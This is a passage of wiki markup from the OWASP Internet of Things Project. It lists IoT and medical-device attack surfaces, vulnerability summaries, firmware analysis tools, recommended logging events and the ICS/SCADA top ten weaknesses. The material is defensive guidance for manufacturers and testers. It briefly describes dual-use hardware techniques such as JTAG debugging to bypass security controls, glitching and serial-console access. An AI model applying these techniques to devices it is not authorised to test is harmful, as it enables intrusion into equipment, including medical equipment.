* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physicall)<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented however it is improperly configured or is not being properly updated, e.g. using SSL v2 <br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* Service can be attacked in a way that denies service to that service or the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting a OTA update<br />
* Downloading from the manufacturers web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI Flash / eMMC chip and reading it in a adapter<br />
|<br />
* Firmware contains a lot of useful information, like source code and binaries of running services, pre-set passwords, ssh keys etc. <br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb we can modify the execution of firmware in the device and bypass almost all software based security controls.<br />
* Side channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, we will obtain full console access to a device<br />
* Usually security measures include custom bootloaders that prevent the attacker from entering single user mode, but that can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out of date versions of busybox, openssl, ssh, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* Allows people to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Ensure supported and up-to-date software is used by developers<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
* Firmware Analysis Comparison Toolkit<br />
* [https://gitlab.com/bytesweep/bytesweep ByteSweep]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
* [https://github.com/scriptingxss/IoTGoat OWASP IoTGoat]<br />
|-<br />
|}<br />
<br />
=== Firmware Security Testing Methodology ===<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file systems for sensitive of interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right: 25px;" valign="top" |<br />
<br />
== What is the IoT Security Logging Project? ==<br />
<br />
The IoT Secure Logging Project provides a list of core events that should be logged in any IoT-related system. The project exists because IoT systems in general are not logging nearly enough events to constitute input for a solid detection and response program around IoT devices, and for companies that want to do this there are not many good resources for what should be logged.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_AppSensor_Project The OWASP AppSensor Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
=ICS/SCADA=<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| valign="top" style="border-right: 1px dotted gray;padding-right:25px;" |<br />
==ICS/SCADA Project==<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
{| class="wikitable" border="1" style="text-align: left"<br />
!Rank and ID<br />
!Title<br />
|-<br />
|'''1 - CWE-119'''<br />
|<br />
*Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|-<br />
|'''2 - CWE-20'''<br />
|<br />
*Improper Input Validation<br />
|-<br />
|'''3 - CWE-22'''<br />
|<br />
*Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
|'''4 - CWE-264'''<br />
|<br />
*Permissions, Privileges, and Access Controls<br />
|-<br />
|'''5 - CWE-200'''<br />
|<br />
*Information Exposure<br />
|-<br />
|'''6 - CWE-255'''<br />
|<br />
*Credentials Management<br />
|-<br />
|'''7 - CWE-287'''<br />
|<br />
*Improper Authentication<br />
|-<br />
|'''8 - CWE-399'''<br />
|<br />
*Resource Management Errors<br />
|-<br />
|'''9 - CWE-79'''<br />
|<br />
*Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|-<br />
|'''10 - CWE-189'''<br />
|<br />
*Numeric Errors<br />
|-<br />
|}{{Social Media Links}}<br />
| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |<br />
==What is the ICS/SCADA Project?==<br />
The ICS/SCADA Project provides:<br />
*A list of the Top 10 most dangerous software weaknesses<br />
==Project Leaders==<br />
*NJ Ouchn<br />
==Related Projects==<br />
*[[OWASP Mobile Security Project|OWASP Mobile Security]]<br />
*[[OWASP Top Ten Project|OWASP Web Top 10]]<br />
==Collaboration==<br />
[https://owasp-iot-security.slack.com/ The Slack Channel]<br />
==Quick Download==<br />
*Coming Soon<br />
==News and Events==<br />
*Coming Soon<br />
|}<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;"></div><br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is global organization supported by over 100 organizations headquartered in Bellevue, Washington with offices in Washington DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance, established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long- term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane]<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=254795OWASP Internet of Things Project2019-09-17T23:17:21Z<p>Aaron.guzman: </p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has been released![[File:OWASP 2018 IoT Top10 Final.jpg|center|thumb|1301x1301px]]<br />
<br />
== Philosophy ==<br />
